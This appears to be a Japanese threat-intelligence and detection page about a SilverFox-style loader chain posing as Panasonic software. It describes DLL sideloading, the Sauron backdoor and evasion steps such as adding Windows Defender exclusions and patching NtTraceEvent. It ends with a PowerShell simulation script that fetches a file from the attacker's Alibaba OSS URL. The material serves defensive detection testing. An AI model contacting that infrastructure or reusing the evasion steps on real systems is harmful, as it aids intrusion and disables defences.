フォローする 
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
この脅威は、正当なパナソニックソフトウェアに偽装された高度なマルチステージローダーチェーンを中心としています。マルウェアはAlibaba OSSを利用してペイロードを配信し、独特の5バイトEOFトレーラー形式を持つ画像ベースの暗号化キャリアに依存しています。最終段階ではSauronバックドアを展開し、サービスの作成とターゲットとなるレジストリの変更を通じて持続性を維持します。
調査
アナリストは静的および動的分析の両方を実施し、TencentとPhilipsのソフトウェアとブランドされたバイナリを含むサイドローディング操作のシーケンスを発見しました。調査により、増分XORとRC4を使用した階層化された復号化ルーチンが暴露され、RPCメカニズムを通じてスケジュールされたタスク作成がありました。メモリフォレンジックとサンドボックスのテレメトリーは、初期のパナソニックテーマのラッパーから最後のSauronバックドアまでの完全な実行パスを再構築するのに役立ちました。
緩和策
組織は、不正なRPCベースのタスクスケジューリングや、 NdrClientCall3を通じた疑わしいスケジュールタスクの作成を監視すべきです。強力なアプリケーション許可リストは、未承認のサイドローディングされたDLLの実行をブロックするのに役立ちます。防御側はまた、ボリュームシャドウコピーの予期しない削除や HKCUSOFTWARE.
の下での疑わしいレジストリの変更を監視するべきです。
この活動が検出された場合は、さらなる横方向の移動やコマンド&コントロール通信を阻止するために、影響を受けたシステムを直ちに分離してください。メモリフォレンジックを行い、注入されたモジュールを特定し、ローダーチェーンの現在の段階を判断します。ネットワークログも、アリババOSSインフラストラクチャやトリアージ中に特定された既知のコマンド&コントロールIPアドレスへのトラフィックについて見直す必要があります。
graph TB %% Class Definitions classDef action fill:#99ccff classDef malware fill:#ff9999 classDef tool fill:#cccccc classDef evasion fill:#ccffcc classDef persistence fill:#ffff99 %% Node Definitions %% Initial Access and Execution exec_user_malicious[“<b>アクション</b> – <b id=’T1204.002’>ユーザー実行: 悪意あるファイル</b><br/><b>ファイル</b>: ainstaller-86533005.exe<br/><b>説明</b>: ユーザーはPanasonic PC通知ソフトウェアに偽装されたトロイの木馬を実行します。”] class exec_user_malicious action %% Obfuscation and Masquerading obf_files[“<b id=’T1027’>難読化されたファイルまたは情報</b><br/><b>技術</b>: マルチレイヤー段階的バッファ<br/><b>メカニズム</b>: カスタムXOR/RC4デコード<br/><b>抽出</b>: 画像キャリアからの5バイトEOFトレーラー。”] class obf_files malware mask_file_type[“<b id=’T1036.008’>偽装: ファイルタイプの偽装</b><br/><b>説明</b>: 暗号化ペイロードを隠すために画像の拡張子(gif, jpg, png, db)を使用。”] class mask_file_type evasion %% Proxy Execution proxy_sys_bin[“<b id=’T1218’>システムバイナリプロキシ実行</b><br/><b>ターゲット1</b>: Tencent UxEnhanceHost が UxEnhance64.dll をロード<br/><b>ターゲット2</b>: Philips/Speech Processing Solutions ホストが XPSPLOG.dll をロード”] class proxy_sys_bin action %% Persistence persist_sched_task[“<b id=’T1053.005’>スケジュールされたタスク/ジョブ: スケジュールされたタスク</b><br/><b>モジュール</b>: VirtuOne<br/><b>メカニズム</b>: \pipeatsvc 経由のRPCコールでタスクスケジューラへ<br/><b>目的</b>: 隠された繰り返しのタスクを作成。”] class persist_sched_task persistence %% Defense Evasion evade_def_impair[“<b id=’T1685’>防御の削減</b><br/><b>アクション</b>: ntdll.dll!NtTraceEvent をパッチング”] class evade_def_impair evasion evade_selective_excl[“<b id=’T1679’>選択的排除</b><br/><b>ツール</b>: PowerShell<br/><b>コマンド</b>: Add-MpPreference -ExclusionPath<br/><b>目的</b>: Windows Defender の除外追加。”] class evade_selective_excl evasion %% Final Stage proxy_rundll32[“<b id=’T1218.011’>システムバイナリプロキシ実行: Rundll32</b><br/><b>ファイル</b>: rundll32.dat<br/><b>エクスポート</b>: エッジ<br/><b>アクション</b>: 悪意のあるサービスをインストールして開始します。”] class proxy_rundll32 action malware_sauron[“<b id=’マルウェア’>マルウェア: Sauron</b><br/><b>タイプ</b>: 悪意のあるサービス<br/><b>能力</b>: 持続的なバックドアとコマンドの開始。”] class malware_sauron malware %% Connections %% Flow of execution exec_user_malicious –>|トリガー| obf_files obf_files –>|利用| mask_file_type mask_file_type –>|導く| proxy_sys_bin proxy_sys_bin –>|有効化| persist_sched_task persist_sched_task –>|促進| evade_def_impair persist_sched_task –>|促進| evade_selective_excl evade_def_impair –>|環境を準備| proxy_rundll32 evade_selective_excl –>|環境を準備| proxy_rundll32 proxy_rundll32 –>|インストール| malware_sauron
攻撃フロー
検出
非典型的なパスからのシステムプロセス実行(プロセス作成を介して)
表示
パブリックユーザープロファイルからの不審な実行(プロセス作成を介して)
表示
不審な VSSADMIN 活動(cmdlineを介して)
表示
Windows Defender 設定の不審な変更(PowerShellを介して)
表示
パブリックユーザープロファイル内の不審なファイル(ファイルイベントを介して)
表示
SilverFoxスタイルのローダーチェーンネットワークインジケータの検出 [Windowsネットワーク接続]
表示
トロイの木馬化されたパナソニック実行ファイルを使用したSilverFoxスタイルローダーチェーンの検出 [Windowsプロセス作成]
表示
シミュレーションの実行
前提条件: テレメトリとベースラインのプリフライトチェックが通過している必要があります。
根拠: このセクションでは、検出ルールをトリガーするために設計された敵技術(TTP)の正確な実行を詳細に述べています。コマンドと記述は直接TTPを反映し、検出論理によって期待されるテレメトリを正確に生成することを目指します。抽象的または無関係な例は誤診につながります。
-
攻撃のナラティブとコマンド: 敵は、正当なクラウドストレージサービスを利用して通常のトラフィックと同化し、第二段階のペイロードをダウンロードしようとしています。攻撃者は、既知のSilverFox Alibaba OSS URLへのローダーの要求をシミュレートするために、PowerShellのワンライナーを使用します:
https://jun616.oss-cn-beijing.aliyuncs.com/tad/payload.exe。このアクションは、aliyuncs.comの評判を利用して単純なドメインフィルタを回避することを目的としていますが、検出ルールで定義された特定の悪意のあるパスを使用しています。 -
回帰テストスクリプト:
# SilverFoxローダーネットワークインジケータのシミュレーション # このスクリプトは、Sigma ルールによって監視されている特定の URL への接続を試みます。 $targetUrl = "https://jun616.oss-cn-beijing.aliyuncs.com/tad/test_file.txt" Write-Host "[!] SilverFoxネットワーク接続のシミュレーションを実行: $targetUrl" try { # 標準的な HTTP プロキシテレメトリを生成するために Invoke-WebRequest を使用 $response = Invoke-WebRequest -Uri $targetUrl -Method Get -UseBasicParsing Write-Host "[+] リクエストが完了しました。ステータスコード: $($response.StatusCode)" } catch { # URL に実際にファイルがホストされていない場合、404 または接続エラーが予想されますが、 # プロキシログには試行が記録されます。 Write-Host "[-] リクエストが試行されました。接続試行のためにプロキシログを確認してください。" } -
クリーンアップコマンド:
# このシミュレーションによる永続的な変更なし; クリーンアップ不要です。 Write-Host "[*] シミュレーションクリーンアップ完了。"